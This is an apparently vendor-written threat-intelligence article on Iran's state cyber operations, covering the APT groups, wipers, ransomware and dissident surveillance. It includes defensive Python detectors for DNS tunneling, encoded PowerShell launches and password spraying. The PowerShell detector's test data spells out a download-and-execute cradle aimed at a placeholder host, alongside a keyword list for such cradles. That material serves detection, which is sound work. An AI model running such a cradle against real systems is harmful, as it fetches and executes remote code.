# Iran's Cyber Operations
## Definition
Iran operates one of the most active and aggressive state-sponsored cyber programs in the world. Unlike Russia's preference for surgical espionage or North Korea's focus on financial theft, Iran's cyber doctrine combines destructive capability with intelligence collection, regional coercion, and ideological messaging. The Iranian cyber apparatus serves as a force multiplier for a nation that cannot match Western or Israeli conventional military power but has repeatedly demonstrated willingness to cause serious harm in cyberspace.
The Iranian government conducts cyber operations through two primary institutional pillars: the Islamic Revolutionary Guard Corps (IRGC) and the Ministry of Intelligence and Security (MOIS). These organizations sponsor, direct, and in some cases directly operate advanced persistent threat (APT) groups that target energy infrastructure, financial systems, government networks, and the personal devices of dissidents, journalists, and diaspora communities worldwide.
Iran's tradecraft has evolved significantly since the early 2010s. The country began as a recipient of cyberattacks (most notably Stuxnet, the U.S.-Israeli operation that damaged Iranian nuclear centrifuges in 2010) and emerged as a capable offensive operator in its own right. Iranian actors now deploy destructive malware, conduct hack-and-leak operations, run influence campaigns, and carry out ransomware attacks that serve both financial and geopolitical objectives. Understanding this program requires understanding the organizational structure behind it, the strategic objectives it serves, and the operational characteristics that distinguish Iranian actors from other state-sponsored threats.
## How It Works
### Organizational Structure
#### IRGC Cyber Command
The Islamic Revolutionary Guard Corps functions as the dominant military and intelligence institution in Iran, with a cyber component that conducts both offensive operations and domestic surveillance. The IRGC sponsors APT33 (also known as Elfin, and tracked by Microsoft as Peach Sandstorm), one of the most technically capable Iranian threat groups. APT33 focuses primarily on the aerospace and energy sectors, with sustained targeting of Saudi Arabia, the United States, and South Korea. The group uses spear-phishing campaigns, password spraying at scale, and exploitation of internet-facing edge devices to gain initial access. Once inside, APT33 deploys destructive wipers to cause maximum damage rather than simply exfiltrating data.
APT34 (also called OilRig or Hazel Sandstorm) is also associated with IRGC-adjacent operations and specializes in targeting governments, financial institutions, and telecommunications providers across the Middle East. APT34 is known for its custom tooling, including a variety of backdoors and credential-harvesting tools that enable long-term persistence on compromised networks. The group uses DNS tunneling for command-and-control communications, a technique that allows malicious traffic to blend with legitimate network activity.
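The DNS-tunneling tradecraft described above is detectable from the defender's side because tunnelled traffic has a shape that ordinary name resolution does not: many unique, long, high-entropy subdomain labels under one parent domain, often with TXT or NULL query types. The following is an added example written for this article, not code from the article's authors or from any vendor it cites. It scores a constructed DNS query log; the log line format, the field names, and the simplification that the "parent domain" is the last two labels (production code would use the Public Suffix List) are all assumptions.

```python
"""DNS-tunneling heuristic over DNS query logs (added example).

Tunnelled C2 tends to produce many unique, long, high-entropy subdomains
under one parent domain, often as TXT/NULL queries. Benign domains produce
short, repetitive labels. This scores each parent domain on those traits.
"""
import base64
import hashlib
import math
from collections import Counter, defaultdict


def _fake_chunk(i: int) -> str:
    # Synthetic stand-in for a tunnel label: 52 base32 characters derived from
    # a hash of a counter. Nothing is actually encoded or exfiltrated here.
    raw = hashlib.sha256(f"constructed-chunk-{i}".encode()).digest()
    return base64.b32encode(raw).decode().rstrip("=").lower()


# Constructed log lines (not real telemetry): "<timestamp> <client> <qname> <qtype>".
SAMPLE_DNS_LOG = [
    *[f"2024-01-10T08:00:{i:02d}Z 10.0.0.5 {_fake_chunk(i)}.ns-relay.example TXT"
      for i in range(10)],
    *[f"2024-01-10T08:01:{i:02d}Z 10.0.0.8 {sub}.cdn.example A"
      for i, sub in enumerate(["static", "assets", "img1", "img2", "css",
                               "js", "fonts", "api", "media", "video"])],
    "2024-01-10T08:02:00Z 10.0.0.9 mail.example MX",  # two labels only: nothing to score
]


def shannon_entropy(s: str) -> float:
    """Bits per character; 0.0 for an empty or single-symbol string."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def split_qname(qname: str):
    """Return (parent_domain, subdomain). Assumption: parent = last two labels."""
    labels = qname.rstrip(".").split(".")
    if len(labels) < 3:
        return None, None
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def score_domains(log_lines, min_queries=8, min_unique_ratio=0.8,
                  min_avg_len=30, min_avg_entropy=3.5):
    """Aggregate per parent domain and flag those whose labels look like a tunnel."""
    stats = defaultdict(lambda: {"queries": 0, "subs": set(), "len": 0,
                                 "entropy": 0.0, "txt": 0, "clients": set()})
    for line in log_lines:
        _ts, client, qname, qtype = line.split()
        parent, sub = split_qname(qname)
        if parent is None:
            continue
        st = stats[parent]
        st["queries"] += 1
        st["subs"].add(sub)
        st["len"] += len(sub)
        st["entropy"] += shannon_entropy(sub.replace(".", ""))
        st["txt"] += qtype.upper() in ("TXT", "NULL")
        st["clients"].add(client)

    findings = []
    for parent, st in stats.items():
        n = st["queries"]
        if n < min_queries:
            continue
        unique_ratio = len(st["subs"]) / n
        avg_len = st["len"] / n
        avg_entropy = st["entropy"] / n
        if (unique_ratio >= min_unique_ratio and avg_len >= min_avg_len
                and avg_entropy >= min_avg_entropy):
            findings.append({
                "domain": parent,
                "queries": n,
                "unique_subdomains": len(st["subs"]),
                "avg_label_len": round(avg_len, 1),
                "avg_entropy": round(avg_entropy, 2),
                "txt_ratio": round(st["txt"] / n, 2),
                "clients": sorted(st["clients"]),
            })
    return findings


if __name__ == "__main__":
    for finding in score_domains(SAMPLE_DNS_LOG):
        print(finding)
```

On the constructed log only `ns-relay.example` is flagged: the CDN domain also has a high unique-subdomain ratio, but its labels are short and low-entropy, which is why the three criteria are combined rather than used alone. Thresholds should be tuned per environment; large SaaS and CDN domains with hashed hostnames are the usual false-positive source, and an allowlist for them is the normal next step.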
#### Ministry of Intelligence and Security (MOIS)
MOIS sponsors APT35 (also called Charming Kitten or Mint Sandstorm), which focuses on espionage rather than destruction. APT35 targets journalists, human rights activists, academics, diplomats, and members of the Iranian diaspora. The group runs sophisticated social engineering campaigns, including fake interview requests, conference invitations, and research collaboration offers. APT35 has developed elaborate personas, building rapport with targets over weeks or months before delivering malicious links or attachments. The group also conducts SMS phishing (smishing) campaigns targeting mobile devices.
MuddyWater (also tracked as Mango Sandstorm) operates under MOIS direction and targets government agencies, telecommunications providers, and defense contractors across the Middle East, Europe, and Central and South Asia. MuddyWater relies heavily on publicly available offensive tools and frameworks, including PowerShell Empire and Metasploit, making attribution more complex. The group uses spear-phishing with malicious attachments and exploits vulnerabilities in internet-facing applications.
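Because MuddyWater leans on public frameworks rather than bespoke malware, hash-based detection buys little; what stays constant is the shape of the launch. Empire-style launchers, as a general matter not stated in the article, are typically a PowerShell command line carrying stealth switches and an `-EncodedCommand` payload (base64 of UTF-16LE text) that fetches and evaluates further code in memory. The following is an added example of behavioural scoring over process-creation events; it is not code from the article's authors. The event field names, the sample command lines, and the placeholder URL are constructed.

```python
"""Behavioural scoring of PowerShell process-creation events (added example).

Scores the *shape* of a living-off-the-land launch: stealth switches plus an
-EncodedCommand payload containing download/eval primitives. No file hashes.
"""
import base64
import re

STEALTH_FLAGS = {"-nop", "-noprofile", "-noni", "-noninteractive",
                 "-w", "-windowstyle", "-ep", "-executionpolicy"}
# Substrings in the decoded script that indicate remote fetch plus in-memory execution.
SUSPICIOUS_CONTENT = ("iex", "invoke-expression", "downloadstring",
                      "net.webclient", "frombase64string")
ALERT_THRESHOLD = 3  # all three reasons present: flags, encoding, suspicious content

# -e, -ec, -enc and -encodedcommand are all accepted abbreviations by PowerShell.
_ENC_RE = re.compile(r"(?i)\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline: str):
    """-EncodedCommand is base64 of UTF-16LE text; return the text or None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_process_event(event: dict):
    """event: {'image': ..., 'cmdline': ...}. Returns (score, reasons, decoded)."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, [], None
    cmdline = event["cmdline"]
    reasons = []
    flags = sorted(STEALTH_FLAGS & set(cmdline.lower().split()))
    if flags:
        reasons.append("stealth flags: " + ", ".join(flags))
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command line")
        hits = [k for k in SUSPICIOUS_CONTENT if k in decoded.lower()]
        if hits:
            reasons.append("decoded content: " + ", ".join(hits))
    return len(reasons), reasons, decoded


def _enc(ps: str) -> str:
    # Helper to build a constructed test vector in PowerShell's own encoding.
    return base64.b64encode(ps.encode("utf-16-le")).decode()


_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events (not real telemetry). The cradle text is a textbook test
# vector and the URL is a placeholder that resolves to nothing.
SAMPLE_EVENTS = [
    {"image": _PS, "cmdline": "powershell.exe -nop -w hidden -enc " + _enc(
        "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.example/x')")},
    {"image": _PS, "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"image": _PS, "cmdline": "powershell.exe Get-Process"},
    {"image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        score, reasons, decoded = score_process_event(ev)
        verdict = "ALERT" if score >= ALERT_THRESHOLD else "info" if score else "ok"
        print(f"{verdict:5} score={score} {reasons} {decoded!r}")
```

The scheduled backup script in the second event scores 1 (execution-policy bypass alone), which is the point of additive scoring: a single administrative switch is noise in most fleets, whereas the combination of stealth switches, an encoded payload and a download-and-evaluate primitive is rarely legitimate and is what the rule escalates.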
### Four Strategic Objectives
#### Regional Power Projection
Iran uses cyber operations to signal capability and coerce regional rivals, particularly Saudi Arabia, the United Arab Emirates, and Israel. Destructive attacks on Gulf state infrastructure serve as both retaliation for perceived aggression and a demonstration that Iran can impose costs without triggering conventional military response. This coercive strategy operates below the threshold of armed conflict while achieving tangible geopolitical effects.
#### Destructive Capability as Deterrence
Iran's most consequential offensive capability is its use of disk-wiping malware. Shamoon, deployed against Saudi Aramco in 2012, destroyed the master boot records of approximately 35,000 computers, rendering them inoperable and temporarily disrupting oil production at the world's largest oil company. A second Shamoon campaign targeted Gulf state organizations in 2016 and 2017. ZeroCleare, a wiper attributed to Iranian actors and deployed against energy and industrial companies in the Middle East in 2019, combined elements of commercial software with custom code to overwrite disk sectors and corrupt file system structures. These destructive operations serve as a deterrent signal: Iran is willing to cause serious economic damage and has the tools to do it.
#### Surveillance of Diaspora and Dissidents
APT35 and related actors run persistent campaigns against Iranian dissidents, opposition figures, journalists, and diaspora communities. These operations serve the domestic political interests of the Iranian government by monitoring and intimidating critics abroad. Targets have included members of groups the Iranian government designates as terrorist organizations, reporters covering Iranian affairs, and academics who study Iranian politics. The surveillance objective explains why Iranian cyber operations often target individuals with sophisticated, persistent social engineering rather than the rapid, automated attacks used against corporate networks.
#### Ransomware as Economic Warfare
Since 2020, Iranian actors have increasingly deployed ransomware as a revenue-generating and coercive tool. Pay2Key, Black Shadow, and related operations attributed to Iranian-linked actors have targeted Israeli companies specifically, deploying ransomware and then threatening to leak stolen data publicly. These operations blur the line between cybercrime and state-sponsored attacks: they generate revenue, coerce victims, and advance geopolitical objectives against Israel simultaneously. The hack-and-leak component, where stolen data is published on dedicated leak sites, adds an influence operations dimension to what might otherwise appear to be conventional ransomware.
### Increasing Collaboration with Russia
Iranian and Russian cyber actors have demonstrated growing operational coordination since 2019. A joint NSA/NCSC advisory documented instances where Iranian actors used Russian-controlled infrastructure and vice versa, though the relationship is one of tactical convenience rather than formal alliance. Iran and Russia share strategic interests in undermining Western institutions and destabilizing shared adversaries, which creates conditions for cooperation even in the absence of formal agreements.
## Why It Matters
Iran's cyber program poses a material threat to critical infrastructure operators, financial institutions, and governments across the Middle East, Europe, and the United States. The 2012 Shamoon attack on Saudi Aramco remains one of the most destructive cyberattacks ever executed against a private company. The 2014 Sands Casino attack (attributed to Iran) wiped systems and disrupted operations at a Las Vegas resort whose owner had publicly called for nuclear strikes on Iran. These incidents demonstrate that Iranian actors are willing to cross lines that most state-sponsored groups avoid.
The ransomware campaigns targeting Israeli companies represent a new model for state-sponsored coercion: using financially motivated attack patterns as cover for geopolitical operations. This approach complicates attribution and response, because victims and governments must determine whether an attack is criminal, state-sponsored, or both before choosing a proportional response.
For U.S. critical infrastructure, Iranian actors have targeted water utilities, energy companies, and financial institutions. In 2021, Iranian actors were linked to attempted intrusions at water treatment facilities. In 2023, CISA and FBI issued joint advisories warning that Iranian government-affiliated actors were actively exploiting vulnerabilities in Unitronics programmable logic controllers used in water and wastewater systems. These operations probe the exact systems whose disruption would cause the most civilian harm.
The surveillance operations against diaspora communities have direct human rights implications. Iranian-Americans, Iranian-Canadians, and Iranians living in Europe face ongoing targeting of their personal devices, communications, and social networks by MOIS-affiliated actors. Researchers, journalists, and civil society organizations that cover Iran face persistent, sophisticated social engineering campaigns.
## CDA Perspective
Iran's cyber operations illustrate precisely why CDA's Planetary Defense Model treats all six domains as simultaneously active. Iranian actors do not follow a clean sequential pattern; a single campaign can involve destructive operations against data (DPS), initial access through unpatched vulnerabilities (VSD), evasion via administrative tools (SPH), credential theft and identity abuse (IAT), and sophisticated threat intelligence collection that the defender must counter with equal sophistication (TID), while regulated organizations facing Iranian attacks must also maintain compliance continuity throughout an active incident (RGA).
The Predictive Defense Intelligence (PDI) methodology within the TID domain addresses Iranian operations directly. PDI requires organizations to build detection pipelines tuned to specific actor TTPs rather than relying on generic indicators of compromise. Iranian actors use publicly documented techniques: password spraying against Microsoft 365 and Azure AD, spear-phishing with malicious OneDrive links, exploitation of known vulnerabilities in VPN appliances and firewalls. PDI maps these known patterns to ATT&CK techniques and builds detection rules that fire on behavioral indicators rather than waiting for signature matches against known malware hashes, which change with each campaign.
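To make the behavioural-detection point concrete for the first TTP named above, here is an added example of a password-spray detector run over constructed sign-in records. It is my illustration, not CDA's PDI tooling or any vendor's rule. The field names are an assumption; Microsoft 365 and Entra ID sign-in logs carry many more fields, but the detection needs only the four facts used here (time, account, source address, outcome). The rule encodes the spray shape itself: one source, many accounts, few failures per account inside a short window, which is what separates a spray from a brute-force attempt on a single account.

```python
"""Password-spray detection over sign-in events (added example).

A spray is ONE source touching MANY accounts with FEW failures each inside
a short window. Brute force is the inverse (one account, many failures) and
must not trip this rule; it needs a different one.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def _ev(ts, user, src_ip, success):
    return {"ts": ts, "user": user, "src_ip": src_ip, "success": success}


# Constructed sign-in records (not real telemetry). Field names are an assumption.
SAMPLE_EVENTS = [
    # Spray: one source, six accounts, one failure each, then a hit on the sixth.
    _ev("2024-01-10T08:00:01Z", "a.ahmadi@example.test", "198.51.100.7", False),
    _ev("2024-01-10T08:00:48Z", "b.brown@example.test", "198.51.100.7", False),
    _ev("2024-01-10T08:01:30Z", "c.chen@example.test", "198.51.100.7", False),
    _ev("2024-01-10T08:02:15Z", "d.diaz@example.test", "198.51.100.7", False),
    _ev("2024-01-10T08:03:02Z", "e.evans@example.test", "198.51.100.7", False),
    _ev("2024-01-10T08:03:50Z", "f.farah@example.test", "198.51.100.7", False),
    _ev("2024-01-10T08:06:10Z", "f.farah@example.test", "198.51.100.7", True),
    # Brute force: one account hammered from one source. Not a spray.
    *[_ev(f"2024-01-10T09:00:{i:02d}Z", "g.gupta@example.test", "203.0.113.9", False)
      for i in range(8)],
    # Benign: a user mistypes once, then succeeds.
    _ev("2024-01-10T10:00:00Z", "h.huang@example.test", "192.0.2.5", False),
    _ev("2024-01-10T10:00:20Z", "h.huang@example.test", "192.0.2.5", True),
]


def detect_password_spray(events, window=timedelta(minutes=10),
                          min_users=5, max_fail_per_user=3):
    """Return one finding per source IP whose failures fit the spray shape."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["src_ip"]].append((_ts(e["ts"]), e["user"], e["success"]))

    findings = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda x: x[0])
        fails = [(t, u) for t, u, ok in evs if not ok]
        best = None
        start = 0
        for end in range(len(fails)):  # sliding time window over failures
            while fails[end][0] - fails[start][0] > window:
                start += 1
            per_user = Counter(u for _, u in fails[start:end + 1])
            spray_shaped = (len(per_user) >= min_users
                            and max(per_user.values()) <= max_fail_per_user)
            if spray_shaped and (best is None or len(per_user) > best["distinct_users"]):
                best = {"src_ip": ip,
                        "window_start": fails[start][0],
                        "window_end": fails[end][0],
                        "distinct_users": len(per_user)}
        if best:
            # A success from the same source after the spray began marks the
            # account most likely compromised; those are escalated first.
            hits = sorted({u for t, u, ok in evs if ok and t >= best["window_start"]})
            best["successful_logins_after_spray"] = hits
            findings.append(best)
    return findings


if __name__ == "__main__":
    for finding in detect_password_spray(SAMPLE_EVENTS):
        print(finding)
```

Keying on the source address is the simplest version; sprays routed through residential proxies or rotating cloud IPs defeat it, so a production pipeline usually adds a second aggregation by user-agent or ASN over a longer window. The per-user failure cap is what keeps a brute-force burst on one account from being mislabelled as a spray.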
When Iranian destructive operations hit, the Planetary Crisis Protocol (PCP) provides the cross-domain incident response structure that a purely technical MSSP cannot. Wiper malware attacks simultaneously destroy data (DPS incident), collapse infrastructure built on vulnerable systems (VSD incident), demonstrate that posture monitoring failed to catch pre-attack reconnaissance (SPH incident), and trigger mandatory regulatory reporting (RGA incident). PCP coordinates response across all six domains simultaneously, assigning domain-specific response actions to parallel workstreams rather than sequential remediation steps that assume the attack is confined to one area.
CDA's approach differs from conventional managed security providers in this specific area: most MSSPs treat Iranian threat actor coverage as a detection-and-response problem confined to endpoint and network monitoring. The PDM treats it as an all-domain problem requiring synchronized defense, where a weakness in any single domain creates an exploitable gap that Iranian actors, with their patience and persistence, will eventually find and use.
## Key Takeaways
- Iran operates cyber capabilities through two primary institutions: the IRGC (sponsoring APT33, APT34) and MOIS (sponsoring APT35/Charming Kitten, MuddyWater), each with distinct targeting priorities and operational styles.
- Iranian actors pioneered the use of disk-wiping malware (Shamoon, ZeroCleare) as a coercive geopolitical tool, causing billions in damages and setting a precedent that other state actors have since followed.
- Ransomware and hack-and-leak operations (Pay2Key, Black Shadow) targeting Israeli companies blend criminal tradecraft with state-sponsored geopolitical objectives, complicating attribution and response.
- The surveillance of diaspora communities and dissidents is a systematic MOIS objective, not a side effect of espionage operations, and it directly threatens the physical safety of targets.
- Iranian actors have demonstrated persistent interest in U.S. critical infrastructure, particularly water utilities and energy companies, consistent with a deterrence strategy that targets civilian infrastructure as leverage.
- Effective defense against Iranian TTPs requires behavioral detection tuned to specific actor patterns, not just signature-based tools, because Iranian groups use legitimate software and publicly available frameworks extensively.
- The Iranian cyber program illustrates why all-domain defense is not a theoretical framework: a single Iranian campaign can simultaneously affect DPS, VSD, SPH, IAT, TID, and RGA domains.
## Related Articles
- North Korea's Cyber Warfare and Financial Theft
- Volt Typhoon
- Russia's Cyber Operations
- Threat Actor Profiling
- Predictive Defense Intelligence (PDI)
- Planetary Crisis Protocol (PCP)
- Critical Infrastructure Security
## Sources
Morgan, Evan. "Eroding Global Stability: The Cybersecurity Strategies of China, Russia, North Korea, and Iran." Irregular Warfare Initiative, Princeton University / Modern War Institute at West Point, November 2025.
Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA). "Iranian Government-Sponsored Actors Conducting Spearphishing Campaign." Joint Cybersecurity Advisory AA21-321A. November 2021.
Microsoft Threat Intelligence. "Peach Sandstorm Password Spray Campaigns Enable Intelligence Collection at High-Value Targets." Microsoft Security Blog, September 2023.
Mandiant. "APT34: New Targeted Attack in the Middle East." Mandiant Threat Intelligence Report, 2019.
CrowdStrike. "2024 Global Threat Report." CrowdStrike Intelligence, February 2024.